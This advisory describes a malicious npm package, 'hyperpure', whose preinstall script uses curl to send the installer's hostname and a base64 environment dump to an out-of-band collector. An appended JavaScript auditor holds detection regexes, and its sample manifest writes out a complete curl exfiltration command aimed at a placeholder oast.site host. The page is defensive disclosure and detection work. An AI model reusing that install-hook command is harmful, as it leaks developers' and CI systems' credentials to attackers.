MAL-2026-6370

Malicious code in hyperpure (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (96c5552a039e4d845c30fae8f2c376eed21309d6b5298193850594fe4b1854d0)

On `npm install`, the preinstall lifecycle script in package.json runs `curl` to POST the installer's hostname (`hostname -f`), current user (`whoami`), working directory (`pwd`), and a base64-encoded dump of the entire process environment (`env | base64 -w0`) over plain HTTP to `http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site`, an interactsh-style out-of-band collector domain. The dumped environment commonly includes CI tokens, cloud credentials (AWS_*, GCP, Azure), npm publish tokens, and other secrets present at install time, so any installer running `npm install hyperpure` discloses those secrets to an attacker-controlled listener. The package itself is otherwise hollow — index.js only exports `{ name: 'hyperpure', version: '1.0.0' }` — and the package metadata claims to be Zomato's internal `hyperpure` restaurant-supply-chain library, matching the shape of a dependency-confusion attack against an internal package name. The harm fires automatically on default install with no user opt-in.
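A pre-install audit for the behaviour described above, as an added example that is not part of the advisory or of any scanner's own code: it inspects a parsed package.json for install-time lifecycle scripts that pair a network tool with environment or host collection. The function name, trait regexes, verdict labels and both sample manifests (including the `placeholder-id` host) are constructed for illustration.

```javascript
// Hooks npm can run automatically at install time, with no user opt-in.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Traits named in the advisory. The regexes are this example's heuristics.
const TRAITS = {
  network_tool: /\b(curl|wget)\b/,
  env_dump: /\b(env|printenv)\s*(\||\)|$)|process\.env/,
  host_recon: /\b(hostname|whoami|pwd)\b/,
  encoding: /\bbase64\b/,
  plain_http: /\bhttp:\/\//,
  // oast.site is the domain on the page; the rest are other public
  // interactsh-style suffixes known to this example. Extend as needed.
  oob_domain: /\.oast\.(site|fun|me|live|pro|online)\b/i,
};

// Returns one finding per install hook present in the manifest.
// "block": network tool plus env/host collection (the advisory's pattern).
// "review": some trait present, but not the full exfiltration pairing.
function auditLifecycleScripts(pkg) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (typeof cmd !== "string") continue;
    const traits = Object.keys(TRAITS).filter((t) => TRAITS[t].test(cmd));
    const exfil =
      traits.includes("network_tool") &&
      (traits.includes("env_dump") || traits.includes("host_recon"));
    const verdict = exfil ? "block" : traits.length ? "review" : "ok";
    findings.push({ hook, traits, verdict });
  }
  return findings;
}

// Constructed manifest shaped like the advisory's description (not the real file).
const SAMPLE_MALICIOUS = {
  name: "hyperpure",
  version: "1.0.0",
  scripts: {
    preinstall:
      'curl -s -X POST -d "h=$(hostname -f)&e=$(env | base64 -w0)" http://placeholder-id.oast.site',
  },
};

// Constructed benign manifest: a local build step and a test script.
const SAMPLE_BENIGN = {
  name: "benign-example",
  version: "1.0.0",
  scripts: { postinstall: "node scripts/build.js", test: "jest" },
};

console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_MALICIOUS), null, 2));
```

Run it against the manifest of a tarball fetched with `npm pack <name>` before installing, and install with `--ignore-scripts` in CI so a missed hook cannot execute.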

Affected packages

npm / hyperpure

No fixed version published yet for hyperpure (npm). Pin to a known-safe version or switch to an alternative.
